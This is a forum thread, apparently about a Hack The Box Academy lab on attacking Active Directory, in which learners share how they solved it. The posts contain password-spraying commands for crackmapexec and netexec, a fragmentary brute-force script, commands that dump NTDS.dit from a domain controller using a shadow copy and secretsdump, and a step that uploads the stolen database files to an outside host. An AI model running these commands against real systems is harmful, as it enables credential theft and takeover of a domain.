Attacking Active Directory & NTDS.dit

Hi guys,

Im stuck with this box: On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston’s credentials as the answer. (Format: username:password, Case-Sensitive)

Problem, i made wordlist with the users, and I use the wordlist’s fence, rockyou-10, and fasttrack… i dont know if the wordlist user that I made is correctly or if the pass file is not these…

Anybody can help me??

I found, sorry guys…
using the wordlist with username-anarchy and de wordlist is fastrack…

Hey there, can you share some more details on this:

I’m having trouble getting the method you described to work.


What have you tried so far? DM me if you need assistance

hey even I got stuck question @ 3rd although have found credentials for carlos and jessica but I can’t get onto evil-winrm with those since it throws an error of authentication failed and cannot get the ntds.dit file. Am I on the right track ??

You’re in the Attacking Active Directory & NTDS.dit section, right?

Have you looked at the hint? It tells you the potential username, but even without that, you could use the previous sections to create the possible usernames from the three people’s names. But to save time, have a guess about which role would have access to the DC and use the hint to gues the username format…

Then you want to attack the domain controller to obtain the credentials you need to steal the NTDS. Just use crackmapexec, don’t worry about winrm.

The command is below, but it is also explained in the section:

crackmapexec smb $IP -u /Username/or/path/to/list -p /usr/share/wordlists/fasttrack.txt

That will give you a username and password for question 3. Those credentials can then be used to steal the NTDS file. Again, use crackmapexec, it’s so much easier:

crackmapexec smb $IP -u $USERNAME -p $PASSWORD

The output of that last command will contain the hash to Jessica’s account that you need to crack. Let me know if you need help with that part - I’ll be online for a few hours.


I got both of them thank you.

1 Like

Your post gave me a ton of ideas;) in how to tackle this problem;) I still struggle quite a lot to make this inferences, thank you;)

Hi guys,

After I created the shadow copy I couldn’t copy it to a different location. But with CME options worked fine. Also, after I created the username.list for cracking the username and password for the target CME didn’t go through the username.list… any advice to this?

Ps. I already complete this module but some options are still unclear.

I wrote a bash script to brute force it, man did it take a long time…


# Define the list of usernames

# Define the path to the password file

# Read the password file into an array
pw_list=($(< "$pw_path"))

# Loop through each username
for username in $namelist; do
  echo "Trying username: $username"
  # Loop through each password
  for password in "${pw_list[@]}"; do
    echo "Trying password: $password"
    # Run crackmapexec with the current username and password
    crackmapexec smb -u "$username" -p "$password"
1 Like

I can’t really figure out how to extract the hashes from the ntds.dit file. I’ve tried a bunch but this is the closest I think?

python3 /opt/useful/impacket/impacket/examples/ -ntds ~/Documents/htb_17_passwords/ad/NTDS.dit ~/Documents/htb_17_passwords/ad/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ./ntlm-extract

Cudos to this guy: Extracting and Cracking NTDS.dit. In previous projects, I have been… | by Mike Bond | Medium
But I don’t get any output. We know Jennifer Stapleton’s username but I cannot for my life extract her PW hash.

Could anyone be so kind and assist me in the hunt for Mrs. jstapleton’s hash?

1 Like

I slept on the issue, previously i didn’t find the correct username in the dump of:
crackmapexec smb <IP> -u <UN> -p <PW> --ntds, but if you look closer, the hash is in there.

/spoiler Was very crazy but works for me :)…

vssadmin CREATE SHADOW /For=C:
cd C:
mkdir NTDS
cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

curl -o PSUpload.ps1
Import-Module .\PSUpload.ps1
Invoke-FileUpload -Uri -File C:\NTDS\NTDS.dit
Invoke-FileUpload -Uri -File C:\NTDS\SYSTEM

impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

Works in my case…

Hi there, the easiest way to use crackmapexec+Jenifer’s firstinitiallastname+the wordlist from previous question.

cat names    
John Marston
Carol Johnson
Jennifer Stapleton
username-anarchy -i names -f flast | tee usernames                                
netexec smb xx.xx.xx.xx -u usernames -p /usr/share/wordlists/fasttrack.txt --continue-on-success --ntds